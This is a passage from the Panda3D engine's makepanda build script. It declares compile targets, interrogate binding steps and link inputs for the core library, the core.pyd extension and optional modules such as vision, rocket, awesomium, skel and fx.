TargetAdd('libp3dgraph_igate.obj', input='libp3dgraph.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/display/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/display', 'BUILDING:PANDA']
TargetAdd('p3display_composite1.obj', opts=OPTS, input='p3display_composite1.cxx')
TargetAdd('p3display_composite2.obj', opts=OPTS, input='p3display_composite2.cxx')
OPTS=['DIR:panda/src/display', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/display', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("renderBuffer.h")
TargetAdd('libp3display.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3display.in', opts=['IMOD:panda3d.core', 'ILIB:libp3display', 'SRCDIR:panda/src/display'])
TargetAdd('libp3display_igate.obj', input='libp3display.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3display_graphicsStateGuardian_ext.obj', opts=OPTS, input='graphicsStateGuardian_ext.cxx')
TargetAdd('p3display_graphicsWindow_ext.obj', opts=OPTS, input='graphicsWindow_ext.cxx')
TargetAdd('p3display_pythonGraphicsWindowProc.obj', opts=OPTS, input='pythonGraphicsWindowProc.cxx')
if RTDIST and GetTarget() == 'darwin':
OPTS=['DIR:panda/src/display']
TargetAdd('subprocessWindowBuffer.obj', opts=OPTS, input='subprocessWindowBuffer.cxx')
TargetAdd('libp3subprocbuffer.ilb', input='subprocessWindowBuffer.obj')
#
# DIRECTORY: panda/src/device/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/device', 'BUILDING:PANDA']
TargetAdd('p3device_composite1.obj', opts=OPTS, input='p3device_composite1.cxx')
TargetAdd('p3device_composite2.obj', opts=OPTS, input='p3device_composite2.cxx')
OPTS=['DIR:panda/src/device', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/device', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3device.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3device.in', opts=['IMOD:panda3d.core', 'ILIB:libp3device', 'SRCDIR:panda/src/device'])
TargetAdd('libp3device_igate.obj', input='libp3device.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pnmtext/
#
if (PkgSkip("FREETYPE")==0 and not RUNTIME):
OPTS=['DIR:panda/src/pnmtext', 'BUILDING:PANDA', 'FREETYPE']
TargetAdd('p3pnmtext_composite1.obj', opts=OPTS, input='p3pnmtext_composite1.cxx')
OPTS=['DIR:panda/src/pnmtext', 'FREETYPE', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pnmtext', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pnmtext.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pnmtext.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pnmtext', 'SRCDIR:panda/src/pnmtext'])
TargetAdd('libp3pnmtext_igate.obj', input='libp3pnmtext.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/text/
#
if (not RUNTIME):
if not PkgSkip("HARFBUZZ"):
DefSymbol("HARFBUZZ", "HAVE_HARFBUZZ")
OPTS=['DIR:panda/src/text', 'BUILDING:PANDA', 'ZLIB', 'FREETYPE', 'HARFBUZZ']
TargetAdd('p3text_composite1.obj', opts=OPTS, input='p3text_composite1.cxx')
TargetAdd('p3text_composite2.obj', opts=OPTS, input='p3text_composite2.cxx')
OPTS=['DIR:panda/src/text', 'ZLIB', 'FREETYPE', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/text', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3text.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3text.in', opts=['IMOD:panda3d.core', 'ILIB:libp3text', 'SRCDIR:panda/src/text'])
TargetAdd('libp3text_igate.obj', input='libp3text.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/movies/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/movies', 'BUILDING:PANDA', 'VORBIS', 'OPUS']
TargetAdd('p3movies_composite1.obj', opts=OPTS, input='p3movies_composite1.cxx')
OPTS=['DIR:panda/src/movies', 'VORBIS', 'OPUS', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/movies', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3movies.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3movies.in', opts=['IMOD:panda3d.core', 'ILIB:libp3movies', 'SRCDIR:panda/src/movies'])
TargetAdd('libp3movies_igate.obj', input='libp3movies.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/grutil/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/grutil', 'BUILDING:PANDA']
TargetAdd('p3grutil_multitexReducer.obj', opts=OPTS, input='multitexReducer.cxx')
TargetAdd('p3grutil_composite1.obj', opts=OPTS, input='p3grutil_composite1.cxx')
TargetAdd('p3grutil_composite2.obj', opts=OPTS, input='p3grutil_composite2.cxx')
OPTS=['DIR:panda/src/grutil', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/grutil', ["*.h", "*_composite*.cxx"])
if 'convexHull.h' in IGATEFILES: IGATEFILES.remove('convexHull.h')
TargetAdd('libp3grutil.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3grutil.in', opts=['IMOD:panda3d.core', 'ILIB:libp3grutil', 'SRCDIR:panda/src/grutil'])
TargetAdd('libp3grutil_igate.obj', input='libp3grutil.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/tform/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/tform', 'BUILDING:PANDA']
TargetAdd('p3tform_composite1.obj', opts=OPTS, input='p3tform_composite1.cxx')
TargetAdd('p3tform_composite2.obj', opts=OPTS, input='p3tform_composite2.cxx')
OPTS=['DIR:panda/src/tform', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/tform', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3tform.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3tform.in', opts=['IMOD:panda3d.core', 'ILIB:libp3tform', 'SRCDIR:panda/src/tform'])
TargetAdd('libp3tform_igate.obj', input='libp3tform.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/collide/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/collide', 'BUILDING:PANDA']
TargetAdd('p3collide_composite1.obj', opts=OPTS, input='p3collide_composite1.cxx')
TargetAdd('p3collide_composite2.obj', opts=OPTS, input='p3collide_composite2.cxx')
OPTS=['DIR:panda/src/collide', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/collide', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3collide.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3collide.in', opts=['IMOD:panda3d.core', 'ILIB:libp3collide', 'SRCDIR:panda/src/collide'])
TargetAdd('libp3collide_igate.obj', input='libp3collide.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/parametrics/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/parametrics', 'BUILDING:PANDA']
TargetAdd('p3parametrics_composite1.obj', opts=OPTS, input='p3parametrics_composite1.cxx')
TargetAdd('p3parametrics_composite2.obj', opts=OPTS, input='p3parametrics_composite2.cxx')
OPTS=['DIR:panda/src/parametrics', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/parametrics', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3parametrics.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3parametrics.in', opts=['IMOD:panda3d.core', 'ILIB:libp3parametrics', 'SRCDIR:panda/src/parametrics'])
TargetAdd('libp3parametrics_igate.obj', input='libp3parametrics.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pgui/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pgui', 'BUILDING:PANDA']
TargetAdd('p3pgui_composite1.obj', opts=OPTS, input='p3pgui_composite1.cxx')
TargetAdd('p3pgui_composite2.obj', opts=OPTS, input='p3pgui_composite2.cxx')
OPTS=['DIR:panda/src/pgui', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/pgui', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3pgui.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3pgui.in', opts=['IMOD:panda3d.core', 'ILIB:libp3pgui', 'SRCDIR:panda/src/pgui'])
TargetAdd('libp3pgui_igate.obj', input='libp3pgui.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/pnmimagetypes/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/pnmimagetypes', 'DIR:panda/src/pnmimage', 'BUILDING:PANDA', 'PNG', 'ZLIB', 'JPEG', 'TIFF', 'OPENEXR', 'EXCEPTIONS']
TargetAdd('p3pnmimagetypes_composite1.obj', opts=OPTS, input='p3pnmimagetypes_composite1.cxx')
TargetAdd('p3pnmimagetypes_composite2.obj', opts=OPTS, input='p3pnmimagetypes_composite2.cxx')
#
# DIRECTORY: panda/src/recorder/
#
if (not RUNTIME):
OPTS=['DIR:panda/src/recorder', 'BUILDING:PANDA']
TargetAdd('p3recorder_composite1.obj', opts=OPTS, input='p3recorder_composite1.cxx')
TargetAdd('p3recorder_composite2.obj', opts=OPTS, input='p3recorder_composite2.cxx')
OPTS=['DIR:panda/src/recorder', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/recorder', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3recorder.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3recorder.in', opts=['IMOD:panda3d.core', 'ILIB:libp3recorder', 'SRCDIR:panda/src/recorder'])
TargetAdd('libp3recorder_igate.obj', input='libp3recorder.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/dxml/
#
DefSymbol("TINYXML", "TIXML_USE_STL", "")
OPTS=['DIR:panda/src/dxml', 'TINYXML']
TargetAdd('tinyxml_composite1.obj', opts=OPTS, input='tinyxml_composite1.cxx')
TargetAdd('libp3tinyxml.ilb', input='tinyxml_composite1.obj')
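# The bundled TinyXML is compiled with STL string support (TIXML_USE_STL) into
# a small static helper library; core.pyd links libp3tinyxml.ilb further below
# when the build is not linking everything statically.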
if (not RUNTIME):
OPTS=['DIR:panda/src/dxml', 'BUILDING:PANDA', 'TINYXML']
TargetAdd('p3dxml_composite1.obj', opts=OPTS, input='p3dxml_composite1.cxx')
OPTS=['DIR:panda/src/dxml', 'TINYXML', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/dxml', ["*.h", "p3dxml_composite1.cxx"])
TargetAdd('libp3dxml.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dxml.in', opts=['IMOD:panda3d.core', 'ILIB:libp3dxml', 'SRCDIR:panda/src/dxml'])
TargetAdd('libp3dxml_igate.obj', input='libp3dxml.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/panda/
#
if (not RUNTIME):
OPTS=['DIR:panda/metalibs/panda', 'BUILDING:PANDA', 'JPEG', 'PNG', 'HARFBUZZ',
'TIFF', 'OPENEXR', 'ZLIB', 'OPENSSL', 'FREETYPE', 'FFTW', 'ADVAPI', 'WINSOCK2',
'SQUISH', 'NVIDIACG', 'VORBIS', 'OPUS', 'WINUSER', 'WINMM', 'WINGDI', 'IPHLPAPI']
TargetAdd('panda_panda.obj', opts=OPTS, input='panda.cxx')
TargetAdd('libpanda.dll', input='panda_panda.obj')
TargetAdd('libpanda.dll', input='p3recorder_composite1.obj')
TargetAdd('libpanda.dll', input='p3recorder_composite2.obj')
TargetAdd('libpanda.dll', input='p3pgraphnodes_composite1.obj')
TargetAdd('libpanda.dll', input='p3pgraphnodes_composite2.obj')
TargetAdd('libpanda.dll', input='p3pgraph_nodePath.obj')
TargetAdd('libpanda.dll', input='p3pgraph_composite1.obj')
TargetAdd('libpanda.dll', input='p3pgraph_composite2.obj')
TargetAdd('libpanda.dll', input='p3pgraph_composite3.obj')
TargetAdd('libpanda.dll', input='p3pgraph_composite4.obj')
TargetAdd('libpanda.dll', input='p3cull_composite1.obj')
TargetAdd('libpanda.dll', input='p3cull_composite2.obj')
TargetAdd('libpanda.dll', input='p3movies_composite1.obj')
TargetAdd('libpanda.dll', input='p3grutil_multitexReducer.obj')
TargetAdd('libpanda.dll', input='p3grutil_composite1.obj')
TargetAdd('libpanda.dll', input='p3grutil_composite2.obj')
TargetAdd('libpanda.dll', input='p3chan_composite1.obj')
TargetAdd('libpanda.dll', input='p3chan_composite2.obj')
TargetAdd('libpanda.dll', input='p3pstatclient_composite1.obj')
TargetAdd('libpanda.dll', input='p3pstatclient_composite2.obj')
TargetAdd('libpanda.dll', input='p3char_composite1.obj')
TargetAdd('libpanda.dll', input='p3char_composite2.obj')
TargetAdd('libpanda.dll', input='p3collide_composite1.obj')
TargetAdd('libpanda.dll', input='p3collide_composite2.obj')
TargetAdd('libpanda.dll', input='p3device_composite1.obj')
TargetAdd('libpanda.dll', input='p3device_composite2.obj')
TargetAdd('libpanda.dll', input='p3dgraph_composite1.obj')
TargetAdd('libpanda.dll', input='p3dgraph_composite2.obj')
TargetAdd('libpanda.dll', input='p3display_composite1.obj')
TargetAdd('libpanda.dll', input='p3display_composite2.obj')
TargetAdd('libpanda.dll', input='p3pipeline_composite1.obj')
TargetAdd('libpanda.dll', input='p3pipeline_composite2.obj')
TargetAdd('libpanda.dll', input='p3pipeline_contextSwitch.obj')
TargetAdd('libpanda.dll', input='p3event_composite1.obj')
TargetAdd('libpanda.dll', input='p3event_composite2.obj')
TargetAdd('libpanda.dll', input='p3gobj_composite1.obj')
TargetAdd('libpanda.dll', input='p3gobj_composite2.obj')
TargetAdd('libpanda.dll', input='p3gsgbase_composite1.obj')
TargetAdd('libpanda.dll', input='p3linmath_composite1.obj')
TargetAdd('libpanda.dll', input='p3linmath_composite2.obj')
TargetAdd('libpanda.dll', input='p3mathutil_composite1.obj')
TargetAdd('libpanda.dll', input='p3mathutil_composite2.obj')
TargetAdd('libpanda.dll', input='p3parametrics_composite1.obj')
TargetAdd('libpanda.dll', input='p3parametrics_composite2.obj')
TargetAdd('libpanda.dll', input='p3pnmimagetypes_composite1.obj')
TargetAdd('libpanda.dll', input='p3pnmimagetypes_composite2.obj')
TargetAdd('libpanda.dll', input='p3pnmimage_composite1.obj')
TargetAdd('libpanda.dll', input='p3pnmimage_composite2.obj')
TargetAdd('libpanda.dll', input='p3pnmimage_convert_srgb_sse2.obj')
TargetAdd('libpanda.dll', input='p3text_composite1.obj')
TargetAdd('libpanda.dll', input='p3text_composite2.obj')
TargetAdd('libpanda.dll', input='p3tform_composite1.obj')
TargetAdd('libpanda.dll', input='p3tform_composite2.obj')
TargetAdd('libpanda.dll', input='p3putil_composite1.obj')
TargetAdd('libpanda.dll', input='p3putil_composite2.obj')
TargetAdd('libpanda.dll', input='p3audio_composite1.obj')
TargetAdd('libpanda.dll', input='p3pgui_composite1.obj')
TargetAdd('libpanda.dll', input='p3pgui_composite2.obj')
TargetAdd('libpanda.dll', input='p3net_composite1.obj')
TargetAdd('libpanda.dll', input='p3net_composite2.obj')
TargetAdd('libpanda.dll', input='p3nativenet_composite1.obj')
TargetAdd('libpanda.dll', input='p3pandabase_pandabase.obj')
TargetAdd('libpanda.dll', input='libpandaexpress.dll')
TargetAdd('libpanda.dll', input='p3dxml_composite1.obj')
TargetAdd('libpanda.dll', input='libp3dtoolconfig.dll')
TargetAdd('libpanda.dll', input='libp3dtool.dll')
if PkgSkip("FREETYPE")==0:
TargetAdd('libpanda.dll', input="p3pnmtext_composite1.obj")
TargetAdd('libpanda.dll', dep='dtool_have_freetype.dat')
TargetAdd('libpanda.dll', opts=OPTS)
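  # Merge the per-directory interrogate databases into one module object, then
  # link it with the generated _igate bindings and the extension helpers to
  # produce the panda3d.core Python extension (core.pyd).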
TargetAdd('core_module.obj', input='libp3dtoolbase.in')
TargetAdd('core_module.obj', input='libp3dtoolutil.in')
TargetAdd('core_module.obj', input='libp3prc.in')
TargetAdd('core_module.obj', input='libp3downloader.in')
TargetAdd('core_module.obj', input='libp3express.in')
TargetAdd('core_module.obj', input='libp3recorder.in')
TargetAdd('core_module.obj', input='libp3pgraphnodes.in')
TargetAdd('core_module.obj', input='libp3pgraph.in')
TargetAdd('core_module.obj', input='libp3cull.in')
TargetAdd('core_module.obj', input='libp3grutil.in')
TargetAdd('core_module.obj', input='libp3chan.in')
TargetAdd('core_module.obj', input='libp3pstatclient.in')
TargetAdd('core_module.obj', input='libp3char.in')
TargetAdd('core_module.obj', input='libp3collide.in')
TargetAdd('core_module.obj', input='libp3device.in')
TargetAdd('core_module.obj', input='libp3dgraph.in')
TargetAdd('core_module.obj', input='libp3display.in')
TargetAdd('core_module.obj', input='libp3pipeline.in')
TargetAdd('core_module.obj', input='libp3event.in')
TargetAdd('core_module.obj', input='libp3gobj.in')
TargetAdd('core_module.obj', input='libp3gsgbase.in')
TargetAdd('core_module.obj', input='libp3linmath.in')
TargetAdd('core_module.obj', input='libp3mathutil.in')
TargetAdd('core_module.obj', input='libp3parametrics.in')
TargetAdd('core_module.obj', input='libp3pnmimage.in')
TargetAdd('core_module.obj', input='libp3text.in')
TargetAdd('core_module.obj', input='libp3tform.in')
TargetAdd('core_module.obj', input='libp3putil.in')
TargetAdd('core_module.obj', input='libp3audio.in')
TargetAdd('core_module.obj', input='libp3nativenet.in')
TargetAdd('core_module.obj', input='libp3net.in')
TargetAdd('core_module.obj', input='libp3pgui.in')
TargetAdd('core_module.obj', input='libp3movies.in')
TargetAdd('core_module.obj', input='libp3dxml.in')
if PkgSkip("FREETYPE")==0:
TargetAdd('core_module.obj', input='libp3pnmtext.in')
TargetAdd('core_module.obj', opts=['PYTHON'])
TargetAdd('core_module.obj', opts=['IMOD:panda3d.core', 'ILIB:core'])
TargetAdd('core.pyd', input='libp3dtoolbase_igate.obj')
TargetAdd('core.pyd', input='p3dtoolbase_typeHandle_ext.obj')
TargetAdd('core.pyd', input='libp3dtoolutil_igate.obj')
TargetAdd('core.pyd', input='p3dtoolutil_ext_composite.obj')
TargetAdd('core.pyd', input='libp3prc_igate.obj')
TargetAdd('core.pyd', input='p3prc_ext_composite.obj')
TargetAdd('core.pyd', input='libp3downloader_igate.obj')
TargetAdd('core.pyd', input='p3downloader_stringStream_ext.obj')
TargetAdd('core.pyd', input='p3express_ext_composite.obj')
TargetAdd('core.pyd', input='libp3express_igate.obj')
TargetAdd('core.pyd', input='libp3recorder_igate.obj')
TargetAdd('core.pyd', input='libp3pgraphnodes_igate.obj')
TargetAdd('core.pyd', input='libp3pgraph_igate.obj')
TargetAdd('core.pyd', input='libp3movies_igate.obj')
TargetAdd('core.pyd', input='libp3grutil_igate.obj')
TargetAdd('core.pyd', input='libp3chan_igate.obj')
TargetAdd('core.pyd', input='libp3pstatclient_igate.obj')
TargetAdd('core.pyd', input='libp3char_igate.obj')
TargetAdd('core.pyd', input='libp3collide_igate.obj')
TargetAdd('core.pyd', input='libp3device_igate.obj')
TargetAdd('core.pyd', input='libp3dgraph_igate.obj')
TargetAdd('core.pyd', input='libp3display_igate.obj')
TargetAdd('core.pyd', input='libp3pipeline_igate.obj')
TargetAdd('core.pyd', input='libp3event_igate.obj')
TargetAdd('core.pyd', input='libp3gobj_igate.obj')
TargetAdd('core.pyd', input='libp3gsgbase_igate.obj')
TargetAdd('core.pyd', input='libp3linmath_igate.obj')
TargetAdd('core.pyd', input='libp3mathutil_igate.obj')
TargetAdd('core.pyd', input='libp3parametrics_igate.obj')
TargetAdd('core.pyd', input='libp3pnmimage_igate.obj')
TargetAdd('core.pyd', input='libp3text_igate.obj')
TargetAdd('core.pyd', input='libp3tform_igate.obj')
TargetAdd('core.pyd', input='libp3putil_igate.obj')
TargetAdd('core.pyd', input='libp3audio_igate.obj')
TargetAdd('core.pyd', input='libp3pgui_igate.obj')
TargetAdd('core.pyd', input='libp3net_igate.obj')
TargetAdd('core.pyd', input='libp3nativenet_igate.obj')
TargetAdd('core.pyd', input='libp3dxml_igate.obj')
if PkgSkip("FREETYPE")==0:
TargetAdd('core.pyd', input="libp3pnmtext_igate.obj")
TargetAdd('core.pyd', input='p3pipeline_pythonThread.obj')
TargetAdd('core.pyd', input='p3putil_ext_composite.obj')
TargetAdd('core.pyd', input='p3pnmimage_pfmFile_ext.obj')
TargetAdd('core.pyd', input='p3event_asyncFuture_ext.obj')
TargetAdd('core.pyd', input='p3event_pythonTask.obj')
TargetAdd('core.pyd', input='p3gobj_ext_composite.obj')
TargetAdd('core.pyd', input='p3pgraph_ext_composite.obj')
TargetAdd('core.pyd', input='p3display_graphicsStateGuardian_ext.obj')
TargetAdd('core.pyd', input='p3display_graphicsWindow_ext.obj')
TargetAdd('core.pyd', input='p3display_pythonGraphicsWindowProc.obj')
TargetAdd('core.pyd', input='core_module.obj')
if not GetLinkAllStatic() and GetTarget() != 'emscripten':
TargetAdd('core.pyd', input='libp3tinyxml.ilb')
TargetAdd('core.pyd', input='libp3interrogatedb.dll')
TargetAdd('core.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('core.pyd', opts=['PYTHON', 'WINSOCK2'])
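# The optional modules below (vision, rocket, awesomium, skel, fx, vrpn, ...)
# follow the same recipe: build a shared library from the composite sources,
# run interrogate over its headers, and link a small <name>.pyd extension.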
#
# DIRECTORY: panda/src/vision/
#
if (PkgSkip("VISION") == 0) and (not RUNTIME):
# We want to know whether we have ffmpeg so that we can override the .avi association.
if not PkgSkip("FFMPEG"):
DefSymbol("OPENCV", "HAVE_FFMPEG")
if not PkgSkip("OPENCV"):
DefSymbol("OPENCV", "HAVE_OPENCV")
if OPENCV_VER_23:
DefSymbol("OPENCV", "OPENCV_VER_23")
OPTS=['DIR:panda/src/vision', 'BUILDING:VISION', 'ARTOOLKIT', 'OPENCV', 'DX9', 'DIRECTCAM', 'JPEG', 'EXCEPTIONS']
TargetAdd('p3vision_composite1.obj', opts=OPTS, input='p3vision_composite1.cxx', dep=[
'dtool_have_ffmpeg.dat',
'dtool_have_opencv.dat',
'dtool_have_directcam.dat',
])
TargetAdd('libp3vision.dll', input='p3vision_composite1.obj')
TargetAdd('libp3vision.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3vision.dll', opts=OPTS)
OPTS=['DIR:panda/src/vision', 'ARTOOLKIT', 'OPENCV', 'DX9', 'DIRECTCAM', 'JPEG', 'EXCEPTIONS', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/vision', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3vision.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3vision.in', opts=['IMOD:panda3d.vision', 'ILIB:libp3vision', 'SRCDIR:panda/src/vision'])
TargetAdd('libp3vision_igate.obj', input='libp3vision.in', opts=["DEPENDENCYONLY"])
TargetAdd('vision_module.obj', input='libp3vision.in')
TargetAdd('vision_module.obj', opts=OPTS)
TargetAdd('vision_module.obj', opts=['IMOD:panda3d.vision', 'ILIB:vision', 'IMPORT:panda3d.core'])
TargetAdd('vision.pyd', input='vision_module.obj')
TargetAdd('vision.pyd', input='libp3vision_igate.obj')
TargetAdd('vision.pyd', input='libp3vision.dll')
TargetAdd('vision.pyd', input='libp3interrogatedb.dll')
TargetAdd('vision.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('vision.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/rocket/
#
if (PkgSkip("ROCKET") == 0) and (not RUNTIME):
OPTS=['DIR:panda/src/rocket', 'BUILDING:ROCKET', 'ROCKET', 'PYTHON']
TargetAdd('p3rocket_composite1.obj', opts=OPTS, input='p3rocket_composite1.cxx')
TargetAdd('libp3rocket.dll', input='p3rocket_composite1.obj')
TargetAdd('libp3rocket.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3rocket.dll', opts=OPTS)
OPTS=['DIR:panda/src/rocket', 'ROCKET', 'RTTI', 'EXCEPTIONS', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/rocket', ["rocketInputHandler.h",
"rocketInputHandler.cxx", "rocketRegion.h", "rocketRegion.cxx", "rocketRegion_ext.h"])
TargetAdd('libp3rocket.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3rocket.in', opts=['IMOD:panda3d.rocket', 'ILIB:libp3rocket', 'SRCDIR:panda/src/rocket'])
TargetAdd('libp3rocket_igate.obj', input='libp3rocket.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3rocket_rocketRegion_ext.obj', opts=OPTS, input='rocketRegion_ext.cxx')
TargetAdd('rocket_module.obj', input='libp3rocket.in')
TargetAdd('rocket_module.obj', opts=OPTS)
TargetAdd('rocket_module.obj', opts=['IMOD:panda3d.rocket', 'ILIB:rocket', 'IMPORT:panda3d.core'])
TargetAdd('rocket.pyd', input='rocket_module.obj')
TargetAdd('rocket.pyd', input='libp3rocket_igate.obj')
TargetAdd('rocket.pyd', input='p3rocket_rocketRegion_ext.obj')
TargetAdd('rocket.pyd', input='libp3rocket.dll')
TargetAdd('rocket.pyd', input='libp3interrogatedb.dll')
TargetAdd('rocket.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('rocket.pyd', opts=['PYTHON', 'ROCKET'])
#
# DIRECTORY: panda/src/p3awesomium
#
if PkgSkip("AWESOMIUM") == 0 and not RUNTIME:
OPTS=['DIR:panda/src/awesomium', 'BUILDING:PANDAAWESOMIUM', 'AWESOMIUM']
TargetAdd('pandaawesomium_composite1.obj', opts=OPTS, input='pandaawesomium_composite1.cxx')
TargetAdd('libp3awesomium.dll', input='pandaawesomium_composite1.obj')
TargetAdd('libp3awesomium.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3awesomium.dll', opts=OPTS)
OPTS=['DIR:panda/src/awesomium', 'AWESOMIUM', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/awesomium', ["*.h", "*_composite1.cxx"])
TargetAdd('libp3awesomium.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3awesomium.in', opts=['IMOD:panda3d.awesomium', 'ILIB:libp3awesomium', 'SRCDIR:panda/src/awesomium'])
TargetAdd('libp3awesomium_igate.obj', input='libp3awesomium.in', opts=["DEPENDENCYONLY"])
TargetAdd('awesomium_module.obj', input='libp3awesomium.in')
TargetAdd('awesomium_module.obj', opts=OPTS)
TargetAdd('awesomium_module.obj', opts=['IMOD:panda3d.awesomium', 'ILIB:awesomium', 'IMPORT:panda3d.core'])
TargetAdd('awesomium.pyd', input='awesomium_module.obj')
TargetAdd('awesomium.pyd', input='libp3awesomium_igate.obj')
TargetAdd('awesomium.pyd', input='libp3awesomium.dll')
TargetAdd('awesomium.pyd', input='libp3interrogatedb.dll')
TargetAdd('awesomium.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('awesomium.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/p3skel
#
if (PkgSkip('SKEL')==0) and (not RUNTIME):
OPTS=['DIR:panda/src/skel', 'BUILDING:PANDASKEL', 'ADVAPI']
TargetAdd('p3skel_composite1.obj', opts=OPTS, input='p3skel_composite1.cxx')
OPTS=['DIR:panda/src/skel', 'ADVAPI', 'PYTHON']
IGATEFILES=GetDirectoryContents("panda/src/skel", ["*.h", "*_composite*.cxx"])
TargetAdd('libp3skel.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3skel.in', opts=['IMOD:panda3d.skel', 'ILIB:libp3skel', 'SRCDIR:panda/src/skel'])
TargetAdd('libp3skel_igate.obj', input='libp3skel.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/p3skel
#
if (PkgSkip('SKEL')==0) and (not RUNTIME):
OPTS=['BUILDING:PANDASKEL', 'ADVAPI']
TargetAdd('libpandaskel.dll', input='p3skel_composite1.obj')
TargetAdd('libpandaskel.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaskel.dll', opts=OPTS)
OPTS=['PYTHON']
TargetAdd('skel_module.obj', input='libp3skel.in')
TargetAdd('skel_module.obj', opts=OPTS)
TargetAdd('skel_module.obj', opts=['IMOD:panda3d.skel', 'ILIB:skel', 'IMPORT:panda3d.core'])
TargetAdd('skel.pyd', input='skel_module.obj')
TargetAdd('skel.pyd', input='libp3skel_igate.obj')
TargetAdd('skel.pyd', input='libpandaskel.dll')
TargetAdd('skel.pyd', input='libp3interrogatedb.dll')
TargetAdd('skel.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('skel.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/distort/
#
if (PkgSkip('PANDAFX')==0) and (not RUNTIME):
OPTS=['DIR:panda/src/distort', 'BUILDING:PANDAFX']
TargetAdd('p3distort_composite1.obj', opts=OPTS, input='p3distort_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandafx', 'DIR:panda/src/distort', 'NVIDIACG', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/distort', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3distort.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3distort.in', opts=['IMOD:panda3d.fx', 'ILIB:libp3distort', 'SRCDIR:panda/src/distort'])
TargetAdd('libp3distort_igate.obj', input='libp3distort.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/pandafx/
#
if (PkgSkip('PANDAFX')==0) and (not RUNTIME):
OPTS=['DIR:panda/metalibs/pandafx', 'DIR:panda/src/distort', 'BUILDING:PANDAFX', 'NVIDIACG']
TargetAdd('pandafx_pandafx.obj', opts=OPTS, input='pandafx.cxx')
TargetAdd('libpandafx.dll', input='pandafx_pandafx.obj')
TargetAdd('libpandafx.dll', input='p3distort_composite1.obj')
TargetAdd('libpandafx.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandafx.dll', opts=['ADVAPI', 'NVIDIACG'])
